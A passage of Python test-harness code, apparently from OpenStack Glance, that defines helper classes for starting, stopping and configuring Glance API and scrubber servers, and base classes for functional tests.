@six.add_metaclass(abc.ABCMeta)
class BaseServer(object):
"""
Class used to easily manage starting and stopping
a server during functional test runs.
"""
def __init__(self, test_dir, port, sock=None):
"""
Creates a new Server object.
:param test_dir: The directory where all test stuff is kept. This is
passed from the FunctionalTestCase.
:param port: The port to start a server up on.
"""
self.debug = True
self.no_venv = False
self.test_dir = test_dir
self.bind_port = port
self.conf_file_name = None
self.conf_base = None
self.paste_conf_base = None
self.exec_env = None
self.deployment_flavor = ''
self.show_image_direct_url = False
self.show_multiple_locations = False
self.property_protection_file = ''
self.needs_database = False
self.log_file = None
self.sock = sock
self.fork_socket = True
self.process_pid = None
self.server_module = None
self.stop_kill = False
self.send_identity_credentials = False
def write_conf(self, **kwargs):
"""
Writes the configuration file for the server to its intended
destination. Returns the name of the configuration file and
the over-ridden config content (may be useful for populating
error messages).
"""
if not self.conf_base:
raise RuntimeError("Subclass did not populate config_base!")
conf_override = self.__dict__.copy()
if kwargs:
conf_override.update(**kwargs)
# A config file and paste.ini to use just for this test...we don't want
# to trample on currently-running Glance servers, now do we?
conf_dir = os.path.join(self.test_dir, 'etc')
conf_filepath = os.path.join(conf_dir, "%s.conf" % self.server_name)
if os.path.exists(conf_filepath):
os.unlink(conf_filepath)
paste_conf_filepath = conf_filepath.replace(".conf", "-paste.ini")
if os.path.exists(paste_conf_filepath):
os.unlink(paste_conf_filepath)
utils.safe_mkdirs(conf_dir)
def override_conf(filepath, overridden):
with open(filepath, 'w') as conf_file:
conf_file.write(overridden)
conf_file.flush()
return conf_file.name
overridden_core = self.conf_base % conf_override
self.conf_file_name = override_conf(conf_filepath, overridden_core)
overridden_paste = ''
if self.paste_conf_base:
overridden_paste = self.paste_conf_base % conf_override
override_conf(paste_conf_filepath, overridden_paste)
overridden = ('==Core config==\n%s\n==Paste config==\n%s' %
(overridden_core, overridden_paste))
return self.conf_file_name, overridden
@abc.abstractmethod
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
pass
@abc.abstractmethod
def stop(self):
pass
def reload(self, expect_exit=True, expected_exitcode=0, **kwargs):
"""
Start and stop the service to reload
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
self.stop()
return self.start(expect_exit=expect_exit,
expected_exitcode=expected_exitcode, **kwargs)
def create_database(self):
"""Create database if required for this server"""
if self.needs_database:
conf_dir = os.path.join(self.test_dir, 'etc')
utils.safe_mkdirs(conf_dir)
conf_filepath = os.path.join(conf_dir, 'glance-manage.conf')
with open(conf_filepath, 'w') as conf_file:
conf_file.write('[DEFAULT]\n')
conf_file.write('sql_connection = %s' % self.sql_connection)
conf_file.flush()
glance_db_env = 'GLANCE_DB_TEST_SQLITE_FILE'
if glance_db_env in os.environ:
# use the empty db created and cached as a tempfile
# instead of spending the time creating a new one
db_location = os.environ[glance_db_env]
shutil.copyfile(db_location, "%s/tests.sqlite" % self.test_dir)
else:
cmd = ('%s -m glance.cmd.manage --config-file %s db sync' %
(sys.executable, conf_filepath))
execute(cmd, no_venv=self.no_venv, exec_env=self.exec_env,
expect_exit=True)
# copy the clean db to a temp location so that it
# can be reused for future tests
(osf, db_location) = tempfile.mkstemp()
os.close(osf)
shutil.copyfile('%s/tests.sqlite' % self.test_dir, db_location)
os.environ[glance_db_env] = db_location
# cleanup the temp file when the test suite is
# complete
def _delete_cached_db():
try:
os.remove(os.environ[glance_db_env])
except Exception:
glance_tests.logger.exception(
"Error cleaning up the file %s" %
os.environ[glance_db_env])
atexit.register(_delete_cached_db)
def dump_log(self):
if not self.log_file:
return "log_file not set for {name}".format(name=self.server_name)
elif not os.path.exists(self.log_file):
return "{log_file} for {name} did not exist".format(
log_file=self.log_file, name=self.server_name)
with open(self.log_file, 'r') as fptr:
return fptr.read().strip()
class PosixServer(BaseServer):
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
"""
Starts the server.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
# Ensure the configuration file is written
self.write_conf(**kwargs)
self.create_database()
cmd = ("%(server_module)s --config-file %(conf_file_name)s"
% {"server_module": self.server_module,
"conf_file_name": self.conf_file_name})
cmd = "%s -m %s" % (sys.executable, cmd)
# close the sock and release the unused port closer to start time
if self.exec_env:
exec_env = self.exec_env.copy()
else:
exec_env = {}
pass_fds = set()
if self.sock:
if not self.fork_socket:
self.sock.close()
self.sock = None
else:
fd = os.dup(self.sock.fileno())
exec_env[utils.GLANCE_TEST_SOCKET_FD_STR] = str(fd)
pass_fds.add(fd)
self.sock.close()
self.process_pid = test_utils.fork_exec(cmd,
logfile=os.devnull,
exec_env=exec_env,
pass_fds=pass_fds)
self.stop_kill = not expect_exit
if self.pid_file:
pf = open(self.pid_file, 'w')
pf.write('%d\n' % self.process_pid)
pf.close()
if not expect_exit:
rc = 0
try:
os.kill(self.process_pid, 0)
except OSError:
raise RuntimeError("The process did not start")
else:
rc = test_utils.wait_for_fork(
self.process_pid,
expected_exitcode=expected_exitcode,
force=False)
# avoid an FD leak
if self.sock:
os.close(fd)
self.sock = None
return (rc, '', '')
def stop(self):
"""
Spin down the server.
"""
if not self.process_pid:
raise Exception('why is this being called? %s' % self.server_name)
if self.stop_kill:
os.kill(self.process_pid, signal.SIGTERM)
rc = test_utils.wait_for_fork(self.process_pid, raise_error=False,
force=self.stop_kill)
return (rc, '', '')
class Win32Server(BaseServer):
def __init__(self, *args, **kwargs):
super(Win32Server, self).__init__(*args, **kwargs)
self._processutils = os_win_utilsfactory.get_processutils()
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
"""
Starts the server.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
# Ensure the configuration file is written
self.write_conf(**kwargs)
self.create_database()
cmd = ("%(server_module)s --config-file %(conf_file_name)s"
% {"server_module": self.server_module,
"conf_file_name": self.conf_file_name})
cmd = "%s -m %s" % (sys.executable, cmd)
# Passing socket objects on Windows is a bit more cumbersome.
# We don't really have to do it.
if self.sock:
self.sock.close()
self.sock = None
self.process = subprocess.Popen(
cmd,
env=self.exec_env)
self.process_pid = self.process.pid
try:
self.job_handle = self._processutils.kill_process_on_job_close(
self.process_pid)
except Exception:
# Could not associate child process with a job, killing it.
self.process.kill()
raise
self.stop_kill = not expect_exit
if self.pid_file:
pf = open(self.pid_file, 'w')
pf.write('%d\n' % self.process_pid)
pf.close()
rc = 0
if expect_exit:
self.process.communicate()
rc = self.process.returncode
return (rc, '', '')
def stop(self):
"""
Spin down the server.
"""
if not self.process_pid:
raise Exception('Server "%s" process not running.'
% self.server_name)
if self.stop_kill:
self.process.terminate()
return (0, '', '')
if os.name == 'nt':
Server = Win32Server
else:
Server = PosixServer
class ApiServer(Server):
"""
Server object that starts/stops/manages the API server
"""
def __init__(self, test_dir, port, policy_file, delayed_delete=False,
pid_file=None, sock=None, **kwargs):
super(ApiServer, self).__init__(test_dir, port, sock=sock)
self.server_name = 'api'
self.server_module = 'glance.cmd.%s' % self.server_name
self.default_store = kwargs.get("default_store", "file")
self.bind_host = "127.0.0.1"
self.metadata_encryption_key = "012345678901234567890123456789ab"
self.image_dir = os.path.join(self.test_dir, "images")
self.pid_file = pid_file or os.path.join(self.test_dir, "api.pid")
self.log_file = os.path.join(self.test_dir, "api.log")
self.image_size_cap = 1099511627776
self.delayed_delete = delayed_delete
self.owner_is_tenant = True
self.workers = 0
self.scrub_time = 5
self.image_cache_dir = os.path.join(self.test_dir,
'cache')
self.image_cache_driver = 'sqlite'
self.policy_file = policy_file
self.policy_default_rule = 'default'
self.property_protection_rule_format = 'roles'
self.image_member_quota = 10
self.image_property_quota = 10
self.image_tag_quota = 10
self.image_location_quota = 2
self.disable_path = None
self.needs_database = True
default_sql_connection = SQLITE_CONN_TEMPLATE % self.test_dir
self.sql_connection = os.environ.get('GLANCE_TEST_SQL_CONNECTION',
default_sql_connection)
self.user_storage_quota = '0'
self.lock_path = self.test_dir
self.location_strategy = 'location_order'
self.store_type_location_strategy_preference = ""
self.send_identity_headers = False
self.conf_base = """[DEFAULT]
debug = %(debug)s
default_log_levels = eventlet.wsgi.server=DEBUG,stevedore.extension=INFO
bind_host = %(bind_host)s
bind_port = %(bind_port)s
metadata_encryption_key = %(metadata_encryption_key)s
send_identity_credentials = %(send_identity_credentials)s
log_file = %(log_file)s
image_size_cap = %(image_size_cap)d
delayed_delete = %(delayed_delete)s
owner_is_tenant = %(owner_is_tenant)s
workers = %(workers)s
scrub_time = %(scrub_time)s
send_identity_headers = %(send_identity_headers)s
image_cache_dir = %(image_cache_dir)s
image_cache_driver = %(image_cache_driver)s
sql_connection = %(sql_connection)s
show_image_direct_url = %(show_image_direct_url)s
show_multiple_locations = %(show_multiple_locations)s
user_storage_quota = %(user_storage_quota)s
lock_path = %(lock_path)s
property_protection_file = %(property_protection_file)s
property_protection_rule_format = %(property_protection_rule_format)s
image_member_quota=%(image_member_quota)s
image_property_quota=%(image_property_quota)s
image_tag_quota=%(image_tag_quota)s
image_location_quota=%(image_location_quota)s
location_strategy=%(location_strategy)s
allow_additional_image_properties = True
[oslo_policy]
policy_file = %(policy_file)s
policy_default_rule = %(policy_default_rule)s
[paste_deploy]
flavor = %(deployment_flavor)s
[store_type_location_strategy]
store_type_preference = %(store_type_location_strategy_preference)s
[glance_store]
filesystem_store_datadir=%(image_dir)s
default_store = %(default_store)s
[import_filtering_opts]
allowed_ports = []
"""
self.paste_conf_base = """[pipeline:glance-api]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
rootapp
[pipeline:glance-api-caching]
pipeline = cors healthcheck versionnegotiation gzip unauthenticated-context
cache rootapp
[pipeline:glance-api-cachemanagement]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
cache
cache_manage
rootapp
[pipeline:glance-api-fakeauth]
pipeline = cors healthcheck versionnegotiation gzip fakeauth context rootapp
[pipeline:glance-api-noauth]
pipeline = cors healthcheck versionnegotiation gzip context rootapp
[composite:rootapp]
paste.composite_factory = glance.api:root_app_factory
/: apiversions
/v2: apiv2app
[app:apiversions]
paste.app_factory = glance.api.versions:create_resource
[app:apiv2app]
paste.app_factory = glance.api.v2.router:API.factory
[filter:healthcheck]
paste.filter_factory = oslo_middleware:Healthcheck.factory
backends = disable_by_file
disable_by_file_path = %(disable_path)s
[filter:versionnegotiation]
paste.filter_factory =
glance.api.middleware.version_negotiation:VersionNegotiationFilter.factory
[filter:gzip]
paste.filter_factory = glance.api.middleware.gzip:GzipMiddleware.factory
[filter:cache]
paste.filter_factory = glance.api.middleware.cache:CacheFilter.factory
[filter:cache_manage]
paste.filter_factory =
glance.api.middleware.cache_manage:CacheManageFilter.factory
[filter:context]
paste.filter_factory = glance.api.middleware.context:ContextMiddleware.factory
[filter:unauthenticated-context]
paste.filter_factory =
glance.api.middleware.context:UnauthenticatedContextMiddleware.factory
[filter:fakeauth]
paste.filter_factory = glance.tests.utils:FakeAuthMiddleware.factory
[filter:cors]
paste.filter_factory = oslo_middleware.cors:filter_factory
allowed_origin=http://valid.example.com
"""
class ApiServerForMultipleBackend(Server):
"""
Server object that starts/stops/manages the API server
"""
def __init__(self, test_dir, port, policy_file, delayed_delete=False,
pid_file=None, sock=None, **kwargs):
super(ApiServerForMultipleBackend, self).__init__(
test_dir, port, sock=sock)
self.server_name = 'api'
self.server_module = 'glance.cmd.%s' % self.server_name
self.default_backend = kwargs.get("default_backend", "file1")
self.bind_host = "127.0.0.1"
self.metadata_encryption_key = "012345678901234567890123456789ab"
self.image_dir_backend_1 = os.path.join(self.test_dir, "images_1")
self.image_dir_backend_2 = os.path.join(self.test_dir, "images_2")
self.image_dir_backend_3 = os.path.join(self.test_dir, "images_3")
self.staging_dir = os.path.join(self.test_dir, "staging")
self.pid_file = pid_file or os.path.join(self.test_dir,
"multiple_backend_api.pid")
self.log_file = os.path.join(self.test_dir, "multiple_backend_api.log")
self.image_size_cap = 1099511627776
self.delayed_delete = delayed_delete
self.owner_is_tenant = True
self.workers = 0
self.scrub_time = 5
self.image_cache_dir = os.path.join(self.test_dir,
'cache')
self.image_cache_driver = 'sqlite'
self.policy_file = policy_file
self.policy_default_rule = 'default'
self.property_protection_rule_format = 'roles'
self.image_member_quota = 10
self.image_property_quota = 10
self.image_tag_quota = 10
self.image_location_quota = 2
self.disable_path = None
self.needs_database = True
default_sql_connection = SQLITE_CONN_TEMPLATE % self.test_dir
self.sql_connection = os.environ.get('GLANCE_TEST_SQL_CONNECTION',
default_sql_connection)
self.user_storage_quota = '0'
self.lock_path = self.test_dir
self.location_strategy = 'location_order'
self.store_type_location_strategy_preference = ""
self.send_identity_headers = False
self.conf_base = """[DEFAULT]
debug = %(debug)s
default_log_levels = eventlet.wsgi.server=DEBUG,stevedore.extension=INFO
bind_host = %(bind_host)s
bind_port = %(bind_port)s
metadata_encryption_key = %(metadata_encryption_key)s
send_identity_credentials = %(send_identity_credentials)s
log_file = %(log_file)s
image_size_cap = %(image_size_cap)d
delayed_delete = %(delayed_delete)s
owner_is_tenant = %(owner_is_tenant)s
workers = %(workers)s
scrub_time = %(scrub_time)s
send_identity_headers = %(send_identity_headers)s
image_cache_dir = %(image_cache_dir)s
image_cache_driver = %(image_cache_driver)s
sql_connection = %(sql_connection)s
show_image_direct_url = %(show_image_direct_url)s
show_multiple_locations = %(show_multiple_locations)s
user_storage_quota = %(user_storage_quota)s
lock_path = %(lock_path)s
property_protection_file = %(property_protection_file)s
property_protection_rule_format = %(property_protection_rule_format)s
image_member_quota=%(image_member_quota)s
image_property_quota=%(image_property_quota)s
image_tag_quota=%(image_tag_quota)s
image_location_quota=%(image_location_quota)s
location_strategy=%(location_strategy)s
allow_additional_image_properties = True
enabled_backends=file1:file,file2:file,file3:file
[oslo_policy]
policy_file = %(policy_file)s
policy_default_rule = %(policy_default_rule)s
[paste_deploy]
flavor = %(deployment_flavor)s
[store_type_location_strategy]
store_type_preference = %(store_type_location_strategy_preference)s
[glance_store]
default_backend = %(default_backend)s
[file1]
filesystem_store_datadir=%(image_dir_backend_1)s
[file2]
filesystem_store_datadir=%(image_dir_backend_2)s
[file3]
filesystem_store_datadir=%(image_dir_backend_3)s
[import_filtering_opts]
allowed_ports = []
[os_glance_staging_store]
filesystem_store_datadir=%(staging_dir)s
"""
self.paste_conf_base = """[pipeline:glance-api]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
rootapp
[pipeline:glance-api-caching]
pipeline = cors healthcheck versionnegotiation gzip unauthenticated-context
cache rootapp
[pipeline:glance-api-cachemanagement]
pipeline =
cors
healthcheck
versionnegotiation
gzip
unauthenticated-context
cache
cache_manage
rootapp
[pipeline:glance-api-fakeauth]
pipeline = cors healthcheck versionnegotiation gzip fakeauth context rootapp
[pipeline:glance-api-noauth]
pipeline = cors healthcheck versionnegotiation gzip context rootapp
[composite:rootapp]
paste.composite_factory = glance.api:root_app_factory
/: apiversions
/v2: apiv2app
[app:apiversions]
paste.app_factory = glance.api.versions:create_resource
[app:apiv2app]
paste.app_factory = glance.api.v2.router:API.factory
[filter:healthcheck]
paste.filter_factory = oslo_middleware:Healthcheck.factory
backends = disable_by_file
disable_by_file_path = %(disable_path)s
[filter:versionnegotiation]
paste.filter_factory =
glance.api.middleware.version_negotiation:VersionNegotiationFilter.factory
[filter:gzip]
paste.filter_factory = glance.api.middleware.gzip:GzipMiddleware.factory
[filter:cache]
paste.filter_factory = glance.api.middleware.cache:CacheFilter.factory
[filter:cache_manage]
paste.filter_factory =
glance.api.middleware.cache_manage:CacheManageFilter.factory
[filter:context]
paste.filter_factory = glance.api.middleware.context:ContextMiddleware.factory
[filter:unauthenticated-context]
paste.filter_factory =
glance.api.middleware.context:UnauthenticatedContextMiddleware.factory
[filter:fakeauth]
paste.filter_factory = glance.tests.utils:FakeAuthMiddleware.factory
[filter:cors]
paste.filter_factory = oslo_middleware.cors:filter_factory
allowed_origin=http://valid.example.com
"""
class ScrubberDaemon(Server):
"""
Server object that starts/stops/manages the Scrubber server
"""
def __init__(self, test_dir, policy_file, daemon=False, **kwargs):
# NOTE(jkoelker): Set the port to 0 since we actually don't listen
super(ScrubberDaemon, self).__init__(test_dir, 0)
self.server_name = 'scrubber'
self.server_module = 'glance.cmd.%s' % self.server_name
self.daemon = daemon
self.image_dir = os.path.join(self.test_dir, "images")
self.scrub_time = 5
self.pid_file = os.path.join(self.test_dir, "scrubber.pid")
self.log_file = os.path.join(self.test_dir, "scrubber.log")
self.metadata_encryption_key = "012345678901234567890123456789ab"
self.lock_path = self.test_dir
default_sql_connection = SQLITE_CONN_TEMPLATE % self.test_dir
self.sql_connection = os.environ.get('GLANCE_TEST_SQL_CONNECTION',
default_sql_connection)
self.policy_file = policy_file
self.policy_default_rule = 'default'
self.send_identity_headers = False
self.conf_base = """[DEFAULT]
debug = %(debug)s
log_file = %(log_file)s
daemon = %(daemon)s
wakeup_time = 2
scrub_time = %(scrub_time)s
metadata_encryption_key = %(metadata_encryption_key)s
lock_path = %(lock_path)s
sql_connection = %(sql_connection)s
sql_idle_timeout = 3600
[glance_store]
filesystem_store_datadir=%(image_dir)s
[oslo_policy]
policy_file = %(policy_file)s
policy_default_rule = %(policy_default_rule)s
"""
def start(self, expect_exit=True, expected_exitcode=0, **kwargs):
if 'daemon' in kwargs:
expect_exit = False
return super(ScrubberDaemon, self).start(
expect_exit=expect_exit,
expected_exitcode=expected_exitcode,
**kwargs)
class FunctionalTest(test_utils.BaseTestCase):
"""
Base test class for any test that wants to test the actual
servers and clients and not just the stubbed out interfaces
"""
inited = False
disabled = False
launched_servers = []
def setUp(self):
super(FunctionalTest, self).setUp()
self.test_dir = self.useFixture(fixtures.TempDir()).path
self.api_protocol = 'http'
self.api_port, api_sock = test_utils.get_unused_port_and_socket()
# NOTE: Scrubber is enabled by default for the functional tests.
# Please disbale it by explicitly setting 'self.include_scrubber' to
# False in the test SetUps that do not require Scrubber to run.
self.include_scrubber = True
# The clients will try to connect to this address. Let's make sure
# we're not using the default '0.0.0.0'
self.config(bind_host='127.0.0.1')
self.tracecmd = tracecmd_osmap.get(platform.system())
conf_dir = os.path.join(self.test_dir, 'etc')
utils.safe_mkdirs(conf_dir)
self.copy_data_file('schema-image.json', conf_dir)
self.copy_data_file('policy.json', conf_dir)
self.copy_data_file('property-protections.conf', conf_dir)
self.copy_data_file('property-protections-policies.conf', conf_dir)
self.property_file_roles = os.path.join(conf_dir,
'property-protections.conf')
property_policies = 'property-protections-policies.conf'
self.property_file_policies = os.path.join(conf_dir,
property_policies)
self.policy_file = os.path.join(conf_dir, 'policy.json')
self.api_server = ApiServer(self.test_dir,
self.api_port,
self.policy_file,
sock=api_sock)
self.scrubber_daemon = ScrubberDaemon(self.test_dir, self.policy_file)
self.pid_files = [self.api_server.pid_file,
self.scrubber_daemon.pid_file]
self.files_to_destroy = []
self.launched_servers = []
# Keep track of servers we've logged so we don't double-log them.
self._attached_server_logs = []
self.addOnException(self.add_log_details_on_exception)
if not self.disabled:
# We destroy the test data store between each test case,
# and recreate it, which ensures that we have no side-effects
# from the tests
self.addCleanup(
self._reset_database, self.api_server.sql_connection)
self.addCleanup(self.cleanup)
self._reset_database(self.api_server.sql_connection)
def set_policy_rules(self, rules):
fap = open(self.policy_file, 'w')
fap.write(jsonutils.dumps(rules))
fap.close()
def _reset_database(self, conn_string):
conn_pieces = urlparse.urlparse(conn_string)
if conn_string.startswith('sqlite'):
# We leave behind the sqlite DB for failing tests to aid
# in diagnosis, as the file size is relatively small and
# won't interfere with subsequent tests as it's in a per-
# test directory (which is blown-away if the test is green)
pass
elif conn_string.startswith('mysql'):
# We can execute the MySQL client to destroy and re-create
# the MYSQL database, which is easier and less error-prone
# than using SQLAlchemy to do this via MetaData...trust me.
database = conn_pieces.path.strip('/')
loc_pieces = conn_pieces.netloc.split('@')
host = loc_pieces[1]
auth_pieces = loc_pieces[0].split(':')
user = auth_pieces[0]
password = ""
if len(auth_pieces) > 1:
if auth_pieces[1].strip():
password = "-p%s" % auth_pieces[1]
sql = ("drop database if exists %(database)s; "
"create database %(database)s;") % {'database': database}
cmd = ("mysql -u%(user)s %(password)s -h%(host)s "
"-e\"%(sql)s\"") % {'user': user, 'password': password,
'host': host, 'sql': sql}
exitcode, out, err = execute(cmd)
self.assertEqual(0, exitcode)
def cleanup(self):
"""
Makes sure anything we created or started up in the
tests are destroyed or spun down
"""
# NOTE(jbresnah) call stop on each of the servers instead of
# checking the pid file. stop() will wait until the child
# server is dead. This eliminates the possibility of a race
# between a child process listening on a port actually dying
# and a new process being started
servers = [self.api_server,
self.scrubber_daemon]
for s in servers:
try:
s.stop()
except Exception:
pass
for f in self.files_to_destroy:
if os.path.exists(f):
os.unlink(f)
def start_server(self,
server,
expect_launch,
expect_exit=True,
expected_exitcode=0,
**kwargs):
"""
Starts a server on an unused port.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the server.
:param server: the server to launch
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
:param expected_exitcode: expected exitcode from the launcher
"""
self.cleanup()
# Start up the requested server
exitcode, out, err = server.start(expect_exit=expect_exit,
expected_exitcode=expected_exitcode,
**kwargs)
if expect_exit:
self.assertEqual(expected_exitcode, exitcode,
"Failed to spin up the requested server. "
"Got: %s" % err)
self.launched_servers.append(server)
launch_msg = self.wait_for_servers([server], expect_launch)
self.assertTrue(launch_msg is None, launch_msg)
def start_with_retry(self, server, port_name, max_retries,
expect_launch=True,
**kwargs):
"""
Starts a server, with retries if the server launches but
fails to start listening on the expected port.
:param server: the server to launch
:param port_name: the name of the port attribute
:param max_retries: the maximum number of attempts
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
"""
launch_msg = None
for i in range(max_retries):
exitcode, out, err = server.start(expect_exit=not expect_launch,
**kwargs)
name = server.server_name
self.assertEqual(0, exitcode,
"Failed to spin up the %s server. "
"Got: %s" % (name, err))
launch_msg = self.wait_for_servers([server], expect_launch)
if launch_msg:
server.stop()
server.bind_port = get_unused_port()
setattr(self, port_name, server.bind_port)
else:
self.launched_servers.append(server)
break
self.assertTrue(launch_msg is None, launch_msg)
def start_servers(self, **kwargs):
"""
Starts the API and Registry servers (glance-control api start
) on unused ports. glance-control
should be installed into the python path
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the servers.
"""
self.cleanup()
# Start up the API server
self.start_with_retry(self.api_server, 'api_port', 3, **kwargs)
if self.include_scrubber:
exitcode, out, err = self.scrubber_daemon.start(**kwargs)
self.assertEqual(0, exitcode,
"Failed to spin up the Scrubber daemon. "
"Got: %s" % err)
def ping_server(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def ping_server_ipv6(self, port):
"""
Simple ping on the port. If responsive, return True, else
return False.
:note We use raw sockets, not ping here, since ping uses ICMP and
has no concept of ports...
The function uses IPv6 (therefore AF_INET6 and ::1).
"""
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
try:
s.connect(("::1", port))
return True
except socket.error:
return False
finally:
s.close()
def wait_for_servers(self, servers, expect_launch=True, timeout=30):
"""
Tight loop, waiting for the given server port(s) to be available.
Returns when all are pingable. There is a timeout on waiting
for the servers to come up.
:param servers: Glance server ports to ping
:param expect_launch: Optional, true iff the server(s) are
expected to successfully start
:param timeout: Optional, defaults to 30 seconds
:returns: None if launch expectation is met, otherwise an
assertion message
"""
now = datetime.datetime.now()
timeout_time = now + datetime.timedelta(seconds=timeout)
replied = []
while (timeout_time > now):
pinged = 0
for server in servers:
if self.ping_server(server.bind_port):
pinged += 1
if server not in replied:
replied.append(server)
if pinged == len(servers):
msg = 'Unexpected server launch status'
return None if expect_launch else msg
now = datetime.datetime.now()
time.sleep(0.05)
failed = list(set(servers) - set(replied))
msg = 'Unexpected server launch status for: '
for f in failed:
msg += ('%s, ' % f.server_name)
if os.path.exists(f.pid_file):
pid = f.process_pid
trace = f.pid_file.replace('.pid', '.trace')
if self.tracecmd:
cmd = '%s -p %d -o %s' % (self.tracecmd, pid, trace)
try:
execute(cmd, raise_error=False, expect_exit=False)
except OSError as e:
if e.errno == errno.ENOENT:
raise RuntimeError('No executable found for "%s" '
'command.' % self.tracecmd)
else:
raise
time.sleep(0.5)
if os.path.exists(trace):
msg += ('\n%s:\n%s\n' % (self.tracecmd,
open(trace).read()))
self.add_log_details(failed)
return msg if expect_launch else None
def stop_server(self, server):
"""
Called to stop a single server in a normal fashion using the
glance-control stop method to gracefully shut the server down.
:param server: the server to stop
"""
# Spin down the requested server
server.stop()
def stop_servers(self):
"""
Called to stop the started servers in a normal fashion. Note
that cleanup() will stop the servers using a fairly draconian
method of sending a SIGTERM signal to the servers. Here, we use
the glance-control stop method to gracefully shut the server down.
This method also asserts that the shutdown was clean, and so it
is meant to be called during a normal test case sequence.
"""
# Spin down the API server
self.stop_server(self.api_server)
if self.include_scrubber:
self.stop_server(self.scrubber_daemon)
def run_sql_cmd(self, sql):
"""
Provides a crude mechanism to run manual SQL commands for backend
DB verification within the functional tests.
The raw result set is returned.
"""
engine = db_api.get_engine()
return engine.execute(sql)
def copy_data_file(self, file_name, dst_dir):
src_file_name = os.path.join('glance/tests/etc', file_name)
shutil.copy(src_file_name, dst_dir)
dst_file_name = os.path.join(dst_dir, file_name)
return dst_file_name
def add_log_details_on_exception(self, *args, **kwargs):
self.add_log_details()
def add_log_details(self, servers=None):
for s in servers or self.launched_servers:
if s.log_file not in self._attached_server_logs:
self._attached_server_logs.append(s.log_file)
self.addDetail(
s.server_name, testtools.content.text_content(s.dump_log()))
class MultipleBackendFunctionalTest(test_utils.BaseTestCase):
"""
Base test class for any test that wants to test the actual
servers and clients and not just the stubbed out interfaces
"""
inited = False
disabled = False
launched_servers = []
def setUp(self):
super(MultipleBackendFunctionalTest, self).setUp()
self.test_dir = self.useFixture(fixtures.TempDir()).path
self.api_protocol = 'http'
self.api_port, api_sock = test_utils.get_unused_port_and_socket()
# NOTE: Scrubber is enabled by default for the functional tests.
# Please disbale it by explicitly setting 'self.include_scrubber' to
# False in the test SetUps that do not require Scrubber to run.
self.include_scrubber = True
self.tracecmd = tracecmd_osmap.get(platform.system())
conf_dir = os.path.join(self.test_dir, 'etc')
utils.safe_mkdirs(conf_dir)
self.copy_data_file('schema-image.json', conf_dir)
self.copy_data_file('policy.json', conf_dir)
self.copy_data_file('property-protections.conf', conf_dir)
self.copy_data_file('property-protections-policies.conf', conf_dir)
self.property_file_roles = os.path.join(conf_dir,
'property-protections.conf')
property_policies = 'property-protections-policies.conf'
self.property_file_policies = os.path.join(conf_dir,
property_policies)
self.policy_file = os.path.join(conf_dir, 'policy.json')
self.api_server_multiple_backend = ApiServerForMultipleBackend(
self.test_dir, self.api_port, self.policy_file, sock=api_sock)
self.scrubber_daemon = ScrubberDaemon(self.test_dir, self.policy_file)
self.pid_files = [self.api_server_multiple_backend.pid_file,
self.scrubber_daemon.pid_file]
self.files_to_destroy = []
self.launched_servers = []
# Keep track of servers we've logged so we don't double-log them.
self._attached_server_logs = []
self.addOnException(self.add_log_details_on_exception)
if not self.disabled:
# We destroy the test data store between each test case,
# and recreate it, which ensures that we have no side-effects
# from the tests
self.addCleanup(
self._reset_database,
self.api_server_multiple_backend.sql_connection)
self.addCleanup(self.cleanup)
self._reset_database(
self.api_server_multiple_backend.sql_connection)
def set_policy_rules(self, rules):
fap = open(self.policy_file, 'w')
fap.write(jsonutils.dumps(rules))
fap.close()
def _reset_database(self, conn_string):
conn_pieces = urlparse.urlparse(conn_string)
if conn_string.startswith('sqlite'):
# We leave behind the sqlite DB for failing tests to aid
# in diagnosis, as the file size is relatively small and
# won't interfere with subsequent tests as it's in a per-
# test directory (which is blown-away if the test is green)
pass
elif conn_string.startswith('mysql'):
# We can execute the MySQL client to destroy and re-create
# the MYSQL database, which is easier and less error-prone
# than using SQLAlchemy to do this via MetaData...trust me.
database = conn_pieces.path.strip('/')
loc_pieces = conn_pieces.netloc.split('@')
host = loc_pieces[1]
auth_pieces = loc_pieces[0].split(':')
user = auth_pieces[0]
password = ""
if len(auth_pieces) > 1:
if auth_pieces[1].strip():
password = "-p%s" % auth_pieces[1]
sql = ("drop database if exists %(database)s; "
"create database %(database)s;") % {'database': database}
cmd = ("mysql -u%(user)s %(password)s -h%(host)s "
"-e\"%(sql)s\"") % {'user': user, 'password': password,
'host': host, 'sql': sql}
exitcode, out, err = execute(cmd)
self.assertEqual(0, exitcode)
def cleanup(self):
"""
Makes sure anything we created or started up in the
tests are destroyed or spun down
"""
# NOTE(jbresnah) call stop on each of the servers instead of
# checking the pid file. stop() will wait until the child
# server is dead. This eliminates the possibility of a race
# between a child process listening on a port actually dying
# and a new process being started
servers = [self.api_server_multiple_backend,
self.scrubber_daemon]
for s in servers:
try:
s.stop()
except Exception:
pass
for f in self.files_to_destroy:
if os.path.exists(f):
os.unlink(f)
def start_server(self,
server,
expect_launch,
expect_exit=True,
expected_exitcode=0,
**kwargs):
"""
Starts a server on an unused port.
Any kwargs passed to this method will override the configuration
value in the conf file used in starting the server.
:param server: the server to launch
:param expect_launch: true iff the server is expected to
successfully start
:param expect_exit: true iff the launched process is expected
to exit in a timely fashion
:param expected_exitcode: expected exitcode from the launcher
"""
self.cleanup()
# Start up the requested server
exitcode, out, err = server.start(expect_exit=expect_exit,
expected_exitcode=expected_exitcode,
**kwargs)
if expect_exit:
self.assertEqual(expected_exitcode, exitcode,
"Failed to spin up the requested server. "
"Got: %s" % err)
self.launched_servers.append(server)
